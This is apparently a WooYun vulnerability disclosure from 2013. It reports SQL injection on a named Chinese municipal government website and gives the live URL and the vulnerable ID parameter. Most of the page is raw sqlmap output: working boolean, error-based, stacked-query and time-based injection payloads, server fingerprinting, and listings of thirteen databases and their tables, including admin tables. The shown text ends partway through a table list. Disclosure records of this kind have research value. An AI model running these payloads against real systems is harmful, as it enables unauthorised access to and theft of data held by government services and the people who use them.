某市政府网站SQL注射 | wooyun-2013-045102| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045102

漏洞标题：某市政府网站SQL注射

漏洞作者： Manning

提交时间：2013-12-11 16:04

修复时间：2014-01-25 16:05

公开时间：2014-01-25 16:05

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-11：细节已通知厂商并且等待厂商处理中
2013-12-15：厂商已经确认，细节仅向厂商公开
2013-12-25：细节向核心白帽子及相关领域专家公开
2014-01-04：细节向普通白帽子公开
2014-01-14：细节向实习白帽子公开
2014-01-25：细节向公众公开
简要描述：

某市政府网站SQL注射
详细说明：

目标站点:邯郸市政府网站
http://gyc.hd.gov.cn/M_Rcqz_View.aspx?ID=000011
涉及13个库全部资料，不再深入了
漏洞证明：

sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
---
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=000011' AND 4247=4247 AND 'vJvE'='vJvE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=000011' AND 4624=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(112)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (4624=4624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(118)+CHAR(110)+CHAR(113))) AND 'LHvd'='LHvd
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ID=000011'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ID=000011' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=000011' AND 4247=4247 AND 'vJvE'='vJvE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=000011' AND 4624=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(112)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (4624=4624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(118)+CHAR(110)+CHAR(113))) AND 'LHvd'='LHvd
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ID=000011'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ID=000011' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: cxgzxxw
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.dtxx_bmdt_list                           | 970     |
| dbo.dtxx_cxxw_list                           | 930     |
| dbo.dtxx_spcx_list                           | 408     |
| dbo.dtxx_xzdt_list                           | 322     |
| dbo.by_flag                                  | 215     |
| dbo.by_flag_27                               | 201     |
| dbo.sysconstraints                           | 137     |
| dbo.rsxx_rmdt_list                           | 135     |
| dbo.smallclass                               | 132     |
| dbo.smallclass_27                            | 125     |
| dbo.ggfw_grbs_nr                             | 91      |
| dbo.fggw_zfwj_list                           | 69      |
| dbo.By_GetNextID                             | 66      |
| dbo.ggfw_grbs_list                           | 65      |
| dbo.ljcx_jctp_list                           | 48      |
| dbo.dtxx_mtgz_list                           | 47      |
| dbo.ggfw_wsbs_list2                          | 37      |
| dbo.zwgk_zxzs_list                           | 30      |
| dbo.bigclass                                 | 25      |
| dbo.lanmu                                    | 25      |
| dbo.bumen                                    | 24      |
| dbo.ljcx_mlcx_list                           | 22      |
| dbo.yjgl_yjcs_list                           | 20      |
| dbo.dzzc_hmc_list                            | 18      |
| dbo.ggfw_lyz_list                            | 15      |
| dbo.yjgl_xgzd_list                           | 15      |
| dbo.ggfw_tzz_list                            | 14      |
| dbo.ggfw_wsbs_lei3                           | 14      |
| dbo.ggfw_frbs_lm                             | 12      |
| dbo.ggfw_grbs_lm                             | 12      |
| dbo.ggfw_wsbs_lei2                           | 12      |
| dbo.ggfw_frbs_list                           | 11      |
| dbo.ggfw_frbs_nr                             | 11      |
| dbo.lhzt_lhtp_list                           | 11      |
| dbo.zhiwu                                    | 11      |
| dbo.ggfw_grbs_lei1                           | 10      |
| dbo.ljcx_czwh_list                           | 10      |
| dbo.dtxx_tzgg_list                           | 9       |
| dbo.ggfw_wsbs_list1                          | 9       |
| dbo.ljcx_zysj_list                           | 9       |
| dbo.ggfw_frbs_lei                            | 8       |
| dbo.ggfw_fwsn_lei                            | 8       |
| dbo.ljcx_cxgk_danye                          | 8       |
| dbo.zwgk_zdgh_list                           | 8       |
| dbo.ggfw_grbs_lei                            | 7       |
| dbo.ljcx_mytc_list                           | 7       |
| dbo.zbcg_zfcg_list                           | 7       |
| dbo.zmhd_jjjc_list                           | 7       |
| dbo.ggfw_fwsn_list                           | 6       |
| dbo.ggfw_tzz_lei                             | 6       |
| dbo.lhzt_lhdt_list                           | 6       |
| dbo.ljcx_cxnj_list                           | 6       |
| dbo.ggfw_lyz_lei                             | 5       |
| dbo.ggfw_wsbs_lei1                           | 5       |
| dbo.ljcx_cyyq_list                           | 5       |
| dbo.ljcx_zmqy_list                           | 5       |
| dbo.zbcg_zbcg_list                           | 5       |
| dbo.bumen_s2                                 | 4       |
| dbo.lhzt_lhbg_list                           | 4       |
| dbo.zmhd_zxzx_list                           | 4       |
| dbo.Items                                    | 3       |
| dbo.syssegments                              | 3       |
| dbo.zwgk_yhzc_list                           | 3       |
| dbo.admin                                    | 2       |
| dbo.ggfw_frbs_lei1                           | 2       |
| dbo.lhzt_lhrc_list                           | 2       |
| dbo.bmgk_gzdt_list                           | 1       |
| dbo.bumen2                                   | 1       |
| dbo.bumen_s                                  | 1       |
| dbo.danwei                                   | 1       |
| dbo.ggfw_wsbs_list0                          | 1       |
| dbo.ljcx_rwys_list                           | 1       |
| dbo.Profile                                  | 1       |
| dbo.Subjects                                 | 1       |
| dbo.Topics                                   | 1       |
| dbo.zmhd_jyxc_list                           | 1       |
| dbo.zwgk_lhzt_list                           | 1       |
| dbo.zwlt_admin                               | 1       |
+----------------------------------------------+---------+
Database: gyc
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.By_City                                  | 473     |
| dbo.zixuntousu                               | 394     |
| dbo.Fwsx_Content                             | 309     |
| dbo.Fwsx_Content1                            | 276     |
| dbo.mail                                     | 273     |
| dbo.by_chanpin_list                          | 245     |
| dbo.helihuajianyi                            | 177     |
| dbo.pishi_list                               | 151     |
| dbo.qianshou_list                            | 130     |
| dbo.by_chanpin_lei1                          | 95      |
| dbo.by_flag                                  | 89      |
| dbo.smallclass                               | 89      |
| dbo.By_GetNextID                             | 54      |
| dbo.sysconstraints                           | 54      |
| dbo.by_chanpin_youqinglianjie                | 48      |
| dbo.by_pinglun                               | 35      |
| dbo.By_Province                              | 34      |
| dbo.Fwsx_List1                               | 26      |
| dbo.S2_Class                                 | 25      |
| dbo.by_falvfagui_xinxi                       | 23      |
| dbo.Fwsx_List                                | 22      |
| dbo.by_Job                                   | 21      |
| dbo.by_chanpin_list1                         | 20      |
| dbo.asc_huifu                                | 17      |
| dbo.up_file_list                             | 17      |
| dbo.by_chanpin_tupianlianjie                 | 14      |
| dbo.bigclass                                 | 12      |
| dbo.by_bumen                                 | 12      |
| dbo.lanmu                                    | 12      |
| dbo.S2_Class1                                | 12      |
| dbo.up_file_lei                              | 12      |
| dbo.S_Class                                  | 11      |
| dbo.by_juese                                 | 10      |
| dbo.by_zhinengshezhi                         | 10      |
| dbo.Fwsx_LanMu                               | 10      |
| dbo.Fwsx_LanMu1                              | 10      |
| dbo.by_chanpin_lei0                          | 9       |
| dbo.by_chanpin_list2                         | 9       |
| dbo.S_Class1                                 | 8       |
| dbo.[asc]                                    | 7       |
| dbo.by_admin                                 | 7       |
| dbo.by_shexiandanwei                         | 7       |
| dbo.by_shexianshuijingbaobiao                | 7       |
| dbo.by_lingdaozhichuang                      | 6       |
| dbo.by_shuishoujindu                         | 6       |
| dbo.by_chanpin_youqinglianjie_wangzhanleibei | 5       |
| dbo.by_falvfagui_fawenyear                   | 4       |
| dbo.by_falvfagui_shuizhong                   | 4       |
| dbo.Mt_Bmfw                                  | 4       |
| dbo.by_falvfagui_fawendanwei                 | 3       |
| dbo.by_falvfagui_wenhao                      | 3       |
| dbo.by_shehuibaoxian                         | 3       |
| dbo.syssegments                              | 3       |
| dbo.by_mudi                                  | 2       |
| dbo.by_Qiuzhi                                | 2       |
| dbo.by_toupiao_toupiaoleibei                 | 2       |
| dbo.Esvchanpin_danye                         | 2       |
| dbo.Esvchanpin_danye_lei0                    | 2       |
| dbo.by_danwei                                | 1       |
| dbo.by_YuanQutuku                            | 1       |
| dbo.by_zhiwu                                 | 1       |
| dbo.ceshitupiao                              | 1       |
| dbo.Esvchanpin_danye2                        | 1       |
+----------------------------------------------+---------+
Database: tempdb
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.syssegments                              | 3       |
+----------------------------------------------+---------+
Database: hdjgx
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.by_send_file                             | 42      |
| dbo.by_flag                                  | 33      |
| dbo.jgx_xxlb_list                            | 27      |
| dbo.smallclass                               | 20      |
| dbo.sysconstraints                           | 20      |
| dbo.By_GetNextID                             | 12      |
| dbo.mail                                     | 12      |
| dbo.jgx_gzdt_list                            | 11      |
| dbo.bigclass                                 | 5       |
| dbo.lanmu                                    | 5       |
| dbo.icon                                     | 4       |
| dbo.syssegments                              | 3       |
| dbo.by_mudi                                  | 2       |
| dbo.by_zhiwu                                 | 2       |
| dbo.by_admin                                 | 1       |
| dbo.by_bumen                                 | 1       |
| dbo.by_danwei                                | 1       |
| dbo.by_juese                                 | 1       |
| dbo.jgx_danye                                | 1       |
| dbo.jgx_ggl_list                             | 1       |
+----------------------------------------------+---------+
Database: hdjjx
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.jrbx_jxzy_list                           | 383     |
| dbo.jrbx_hyzy_list                           | 72      |
| dbo.by_flag                                  | 62      |
| dbo.by_send_file                             | 42      |
| dbo.smallclass                               | 36      |
| dbo.sysconstraints                           | 23      |
| dbo.jrbx_hdjj_list                           | 17      |
| dbo.by_juese                                 | 12      |
| dbo.mail                                     | 12      |
| dbo.by_admin                                 | 10      |
| dbo.By_GetNextID                             | 9       |
| dbo.jrbx_ggl_list                            | 9       |
| dbo.jrbx_gzdt_list                           | 7       |
| dbo.bigclass                                 | 5       |
| dbo.lanmu                                    | 5       |
| dbo.syssegments                              | 3       |
| dbo.by_mudi                                  | 2       |
| dbo.by_zhiwu                                 | 2       |
| dbo.jrbx_danye                               | 2       |
| dbo.by_bumen                                 | 1       |
| dbo.by_danwei                                | 1       |
+----------------------------------------------+---------+
Database: msdb
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.RTblRelships                             | 6910    |
| dbo.RTblIfaceHier                            | 3345    |
| dbo.RTblVersionAdminInfo                     | 2328    |
| dbo.RTblVersions                             | 2328    |
| dbo.RTblNamedObj                             | 2191    |
| dbo.RTblIfaceMem                             | 1186    |
| dbo.RTblPropDefs                             | 794     |
| dbo.RTblClassDefs                            | 537     |
| dbo.RTblIfaceDefs                            | 452     |
| dbo.RTblProps                                | 392     |
| dbo.RTblRelColDefs                           | 320     |
| dbo.RTblRelshipDefs                          | 144     |
| dbo.RTblParameterDef                         | 136     |
| dbo.sysconstraints                           | 91      |
| dbo.RTblSites                                | 38      |
| dbo.RTblRelshipProps                         | 28      |
| dbo.syscategories                            | 19      |
| dbo.RTblTypeLibs                             | 16      |
| dbo.sysalerts                                | 9       |
| dbo.sysdtscategories                         | 3       |
| dbo.syssegments                              | 3       |
| dbo.RTblDatabaseVersion                      | 1       |
| dbo.sysdbmaintplans                          | 1       |
| dbo.systargetservers_view                    | 1       |
+----------------------------------------------+---------+
Database: pubs
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.roysched                                 | 86      |
| dbo.employee                                 | 43      |
| dbo.sysconstraints                           | 34      |
| dbo.titleauthor                              | 25      |
| dbo.titleview                                | 25      |
| dbo.authors                                  | 23      |
| dbo.sales                                    | 21      |
| dbo.titles                                   | 18      |
| dbo.jobs                                     | 14      |
| dbo.pub_info                                 | 8       |
| dbo.publishers                               | 8       |
| dbo.stores                                   | 6       |
| dbo.discounts                                | 3       |
| dbo.syssegments                              | 3       |
+----------------------------------------------+---------+
Database: master
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS                | 3350    |
| INFORMATION_SCHEMA.ROUTINES                  | 960     |
| dbo.spt_values                               | 727     |
| INFORMATION_SCHEMA.COLUMNS                   | 392     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES         | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE         | 302     |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS           | 154     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE          | 63      |
| dbo.spt_datatype_info                        | 36      |
| INFORMATION_SCHEMA.TABLES                    | 36      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES          | 34      |
| dbo.spt_server_info                          | 29      |
| INFORMATION_SCHEMA.VIEWS                     | 26      |
| dbo.spt_provider_types                       | 25      |
| INFORMATION_SCHEMA.SCHEMATA                  | 13      |
| dbo.spt_datatype_info_ext                    | 10      |
| dbo.syslogins                                | 3       |
| dbo.syssegments                              | 3       |
| dbo.MSreplication_options                    | 2       |
| dbo.spt_monitor                              | 1       |
| dbo.sysconstraints                           | 1       |
| dbo.sysoledbusers                            | 1       |
+----------------------------------------------+---------+
Database: xzqlgktmw1
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.cfgk                                     | 43032   |
| dbo.degk                                     | 38796   |
| dbo.djgk                                     | 30445   |
| dbo.dsgk_gzdt_list                           | 2489    |
| dbo.dsgk_ggl_list                            | 1310    |
| dbo.jmgk                                     | 1257    |
| dbo.dsgk_xgwj_list                           | 530     |
| dbo.dsgk_ldjh_list                           | 518     |
| dbo.dsgk_bszn_list                           | 513     |
| dbo.dsgk_jcgg_list                           | 384     |
| dbo.by_bumen                                 | 295     |
| dbo.dsgk_gzjl_list                           | 181     |
| dbo.dsgk_qsgg_list                           | 152     |
| dbo.dsgk_zlxz_list                           | 150     |
| dbo.dsgk_ldjs_list                           | 118     |
| dbo.dsgk_danye                               | 69      |
| dbo.by_flag                                  | 51      |
| dbo.by_send_file                             | 42      |
| dbo.smallclass                               | 35      |
| dbo.sysconstraints                           | 35      |
| dbo.by_danwei                                | 24      |
| dbo.by_admin                                 | 23      |
| dbo.by_zhiwu                                 | 23      |
| dbo.By_GetNextID                             | 16      |
| dbo.mail                                     | 12      |
| dbo.dsgk_zqml_leibie                         | 9       |
| dbo.bigclass                                 | 7       |
| dbo.lanmu                                    | 7       |
| dbo.syssegments                              | 3       |
| dbo.by_juese                                 | 2       |
| dbo.by_mudi                                  | 2       |
+----------------------------------------------+---------+
Database: duanxin
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.fasongjilu                               | 33      |
| dbo.sysconstraints                           | 7       |
| dbo.admin                                    | 5       |
| dbo.chongzhijilu                             | 5       |
| dbo.syssegments                              | 3       |
| dbo.gonggao                                  | 1       |
+----------------------------------------------+---------+
Database: model
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.syssegments                              | 3       |
+----------------------------------------------+---------+
Database: Northwind
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.Invoices                                 | 2155    |
| dbo.Orders                                   | 830     |
| dbo.Customers                                | 91      |
| dbo.Products                                 | 77      |
| dbo.Territories                              | 53      |
| dbo.EmployeeTerritories                      | 49      |
| dbo.sysconstraints                           | 43      |
| dbo.Suppliers                                | 29      |
| dbo.Employees                                | 9       |
| dbo.Categories                               | 8       |
| dbo.Region                                   | 4       |
| dbo.Shippers                                 | 3       |
| dbo.syssegments                              | 3       |
+----------------------------------------------+---------+
Database: kfqgsj
+----------------------------------------------+---------+
| Table                                        | Entries |
+----------------------------------------------+---------+
| dbo.by_flag                                  | 57      |
| dbo.sysconstraints                           | 48      |
| dbo.by_send_file                             | 42      |
| dbo.smallclass                               | 31      |
| dbo.by_zhiwu                                 | 23      |
| dbo.By_GetNextID                             | 18      |
| dbo.by_chanpin_lei1                          | 17      |
| dbo.by_biaogexiazai_list                     | 16      |
| dbo.ComSet                                   | 16      |
| dbo.by_dengjizhinan_list                     | 13      |
| dbo.by_juese                                 | 12      |
| dbo.bigclass                                 | 10      |
| dbo.by_gongshangdongtai_list                 | 10      |
| dbo.lanmu                                    | 10      |
| dbo.by_shipinanquan_list                     | 9       |
| dbo.by_xzqlgktm_list                         | 9       |
| dbo.by_zhengcefagui_list                     | 9       |
| dbo.by_biaogexiazai_lei                      | 8       |
| dbo.by_chanpin_lei0                          | 7       |
| dbo.by_bumen                                 | 6       |
| dbo.by_shichangjianguan_list                 | 6       |
| dbo.by_tongzhigonggao_list                   | 6       |
| dbo.by_zhucedengji_list                      | 6       |
| dbo.by_admin                                 | 5       |
| dbo.by_dengjizhinan_lei                      | 4       |
| dbo.OutBox                                   | 4       |
| dbo.by_danye_lei                             | 3       |
| dbo.syssegments                              | 3       |
| dbo.by_mudi                                  | 2       |
| dbo.by_zcdj_zxzx                             | 2       |
| dbo.badoutbox                                | 1       |
| dbo.by_danwei                                | 1       |
| dbo.by_danye                                 | 1       |
| dbo.by_jiari                                 | 1       |
| dbo.by_tszx                                  | 1       |
| dbo.icon                                     | 1       |
| dbo.SendedOutBox                             | 1       |
+----------------------------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=000011' AND 4247=4247 AND 'vJvE'='vJvE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=000011' AND 4624=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(112)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (4624=4624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(118)+CHAR(110)+CHAR(113))) AND 'LHvd'='LHvd
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ID=000011'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ID=000011' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [13]:
[*] cxgzxxw
[*] duanxin
[*] gyc
[*] hdjgx
[*] hdjjx
[*] kfqgsj
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xzqlgktmw1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=000011' AND 4247=4247 AND 'vJvE'='vJvE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=000011' AND 4624=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(112)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (4624=4624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(118)+CHAR(110)+CHAR(113))) AND 'LHvd'='LHvd
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ID=000011'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ID=000011' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: cxgzxxw
[141 tables]
+--------------------------------------------+
| By_GetNextID                               |
| Items                                      |
| Profile                                    |
| Subjects                                   |
| Topics                                     |
| admin                                      |
| admin2                                     |
| bigclass                                   |
| bmgk_gkbb_list                             |
| bmgk_gkzn_list                             |
| bmgk_gzdt_list                             |
| bumen                                      |
| bumen2                                     |
| bumen_s                                    |
| bumen_s2                                   |
| by_flag                                    |
| by_flag_27                                 |
| by_juese                                   |
| by_mudi                                    |
| csxx_czjs_list                             |
| csxx_czys_list                             |
| csxx_ssqk_list                             |
| csxx_zdxm_list                             |
| danwei                                     |
| dtproperties                               |
| dtxx_bmdt_list                             |
| dtxx_cfzb_list                             |
| dtxx_cxxw_list                             |
| dtxx_mtgz_list                             |
| dtxx_sjjh_list                             |
| dtxx_spcx_list                             |
| dtxx_tzgg_list                             |
| dtxx_xzdt_list                             |
| dtxx_xzjh_list                             |
| dzzc_hmc_list                              |
| dzzc_zqgj_list                             |
| dzzc_zqml_list                             |
| dzzc_zyhd_list                             |
| dzzc_zyjh_list                             |
| fggw_dffg_list                             |
| fggw_xzbm_list                             |
| fggw_xzwj_list                             |
| fggw_zcjd_list                             |
| fggw_zfgz_list                             |
| fggw_zfwj_list                             |
| ggfw_frbs_lei                              |
| ggfw_frbs_lei1                             |
| ggfw_frbs_list                             |
| ggfw_frbs_lm                               |
| ggfw_frbs_nr                               |
| ggfw_fwsn_lei                              |
| ggfw_fwsn_list                             |
| ggfw_grbs_lei                              |
| ggfw_grbs_lei1                             |
| ggfw_grbs_list                             |
| ggfw_grbs_lm                               |
| ggfw_grbs_nr                               |
| ggfw_lyz_lei                               |
| ggfw_lyz_list                              |
| ggfw_tzz_lei                               |
| ggfw_tzz_list                              |
| ggfw_wsbs_lei1                             |
| ggfw_wsbs_lei2                             |
| ggfw_wsbs_lei3                             |
| ggfw_wsbs_list0                            |
| ggfw_wsbs_list1                            |
| ggfw_wsbs_list2                            |
| gwgk_bsfw_list                             |
| gwgk_xzxk_list                             |
| icon                                       |
| lanmu                                      |
| lhzt_lhbg_list                             |
| lhzt_lhdt_list                             |
| lhzt_lhrc_list                             |
| lhzt_lhsp_list                             |
| lhzt_lhtp_list                             |
| ljcx_cxgk_danye                            |
| ljcx_cxnj_list                             |
| ljcx_cyyq_list                             |
| ljcx_czwh_list                             |
| ljcx_dzdt_list                             |
| ljcx_hzjq_list                             |
| ljcx_jctp_list                             |
| ljcx_mlcx_list                             |
| ljcx_mytc_list                             |
| ljcx_qjgh_list                             |
| ljcx_rwys_list                             |
| ljcx_zmqy_list                             |
| ljcx_zmrw_list                             |
| ljcx_zysj_list                             |
| rsxx_gbxb_list                             |
| rsxx_gwyzl_list                            |
| rsxx_jypx_list                             |
| rsxx_rmdt_list                             |
| smallclass                                 |
| smallclass_27                              |
| sysconstraints                             |
| syssegments                                |
| tjxx_tjdt_list                             |
| tjxx_tjnb_list                             |
| tjxx_tjyb_list                             |
| tjxx_tjzb_list                             |
| wspy_danwei                                |
| wspy_dept                                  |
| xzgk_gkbb_list                             |
| xzgk_gkzn_list                             |
| xzgk_gzdt_list                             |
| xzgk_ldjj_list                             |
| xzgk_xzgk_list                             |
| xzgk_zdgk_list                             |
| xzgk_zzjg_list                             |
| yjgl_dxal_list                             |
| yjgl_xgzd_list                             |
| yjgl_yjcs_list                             |
| yjgl_yjxx_list                             |
| yjgl_yjya_list                             |
| ylws_ylgg_list                             |
| zbcg_zbcg_list                             |
| zbcg_zfcg_list                             |
| zdgk_cxjs_list                             |
| zdgk_gysy_list                             |
| zdgk_tdzy_list                             |
| zhiwu                                      |
| zmhd_jjjc_list                             |
| zmhd_jyxc_list                             |
| zmhd_myzj_list                             |
| zmhd_wsts_list                             |
| zmhd_xzxx_list                             |
| zmhd_zxzx_list                             |
| zwgk_jdjc_list                             |
| zwgk_lhzt_list                             |
| zwgk_xzsf_list                             |
| zwgk_yhzc_list                             |
| zwgk_zdgc_list                             |
| zwgk_zdgh_list                             |
| zwgk_zxzs_list                             |
| zwlt_admin                                 |
| zwlt_huifu                                 |
| zwlt_zhuti                                 |
| zzjg_nsjg_list                             |
| zzjg_zyzz_list                             |
+--------------------------------------------+
Database: duanxin
[8 tables]
+--------------------------------------------+
| admin                                      |
| chongzhijilu                               |
| dtproperties                               |
| fasongjilu                                 |
| gonggao                                    |
| sysconstraints                             |
| syssegments                                |
| tongxunlu                                  |
+--------------------------------------------+
Database: gyc
[70 tables]
+--------------------------------------------+
| By_City                                    |
| By_GetNextID                               |
| By_Province                                |
| Esvchanpin_danye                           |
| Esvchanpin_danye1                          |
| Esvchanpin_danye2                          |
| Esvchanpin_danye_lei0                      |
| Fwsx_Content                               |
| Fwsx_Content1                              |
| Fwsx_Content1_2                            |
| Fwsx_Content_2                             |
| Fwsx_LanMu                                 |
| Fwsx_LanMu1                                |
| Fwsx_List                                  |
| Fwsx_List1                                 |
| Mt_Bmfw                                    |
| S2_Class                                   |
| S2_Class1                                  |
| S_Class                                    |
| S_Class1                                   |
| asc                                        |
| asc_huifu                                  |
| bigclass                                   |
| by_Job                                     |
| by_Qiuzhi                                  |
| by_YuanQutuku                              |
| by_admin                                   |
| by_bumen                                   |
| by_chanpin_lei0                            |
| by_chanpin_lei1                            |
| by_chanpin_list                            |
| by_chanpin_list1                           |
| by_chanpin_list2                           |
| by_chanpin_tupianlianjie                   |
| by_chanpin_youqinglianjie                  |
| by_chanpin_youqinglianjie_wangzhanleibei   |
| by_danwei                                  |
| by_falvfagui_fawendanwei                   |
| by_falvfagui_fawenyear                     |
| by_falvfagui_shuizhong                     |
| by_falvfagui_wenhao                        |
| by_falvfagui_xinxi                         |
| by_flag                                    |
| by_juese                                   |
| by_lingdaozhichuang                        |
| by_mudi                                    |
| by_pinglun                                 |
| by_shehuibaoxian                           |
| by_shexiandanwei                           |
| by_shexianshuijingbaobiao                  |
| by_shuishoujindu                           |
| by_toupiao_toupiaoguanli                   |
| by_toupiao_toupiaoleibei                   |
| by_zhinengshezhi                           |
| by_zhiwu                                   |
| ceshitupiao                                |
| dtproperties                               |
| helihuajianyi                              |
| icon                                       |
| lanmu                                      |
| mail                                       |
| pishi_list                                 |
| qianshou_list                              |
| qianshou_list2                             |
| smallclass                                 |
| sysconstraints                             |
| syssegments                                |
| up_file_lei                                |
| up_file_list                               |
| zixuntousu                                 |
+--------------------------------------------+
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: hdjgx
[21 tables]
+--------------------------------------------+
| By_GetNextID                               |
| bigclass                                   |
| by_admin                                   |
| by_bumen                                   |
| by_danwei                                  |
| by_flag                                    |
| by_juese                                   |
| by_mudi                                    |
| by_send_file                               |
| by_zhiwu                                   |
| dtproperties                               |
| icon                                       |
| jgx_danye                                  |
| jgx_ggl_list                               |
| jgx_gzdt_list                              |
| jgx_xxlb_list                              |
| lanmu                                      |
| mail                                       |
| smallclass                                 |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: hdjjx
[24 tables]
+--------------------------------------------+
| By_GetNextID                               |
| bigclass                                   |
| by_admin                                   |
| by_bumen                                   |
| by_danwei                                  |
| by_flag                                    |
| by_juese                                   |
| by_mudi                                    |
| by_send_file                               |
| by_zhiwu                                   |
| dtproperties                               |
| icon                                       |
| jrbx_danye                                 |
| jrbx_ggl_list                              |
| jrbx_gzdt_list                             |
| jrbx_hdjj_list                             |
| jrbx_hyzy_list                             |
| jrbx_jxzy_leibie                           |
| jrbx_jxzy_list                             |
| lanmu                                      |
| mail                                       |
| smallclass                                 |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: msdb
[77 tables]
+--------------------------------------------+
| RTblClassDefs                              |
| RTblDBMProps                               |
| RTblDBXProps                               |
| RTblDTMProps                               |
| RTblDTSProps                               |
| RTblDatabaseVersion                        |
| RTblEQMProps                               |
| RTblEnumerationDef                         |
| RTblEnumerationValueDef                    |
| RTblGENProps                               |
| RTblIfaceDefs                              |
| RTblIfaceHier                              |
| RTblIfaceMem                               |
| RTblMDSProps                               |
| RTblNamedObj                               |
| RTblOLPProps                               |
| RTblParameterDef                           |
| RTblPropDefs                               |
| RTblProps                                  |
| RTblRelColDefs                             |
| RTblRelshipDefs                            |
| RTblRelshipProps                           |
| RTblRelships                               |
| RTblSIMProps                               |
| RTblScriptDefs                             |
| RTblSites                                  |
| RTblSumInfo                                |
| RTblTFMProps                               |
| RTblTypeInfo                               |
| RTblTypeLibs                               |
| RTblUMLProps                               |
| RTblUMXProps                               |
| RTblVersionAdminInfo                       |
| RTblVersions                               |
| RTblWorkspaceItems                         |
| backupfile                                 |
| backupmediafamily                          |
| backupmediaset                             |
| backupset                                  |
| log_shipping_primaries                     |
| log_shipping_secondaries                   |
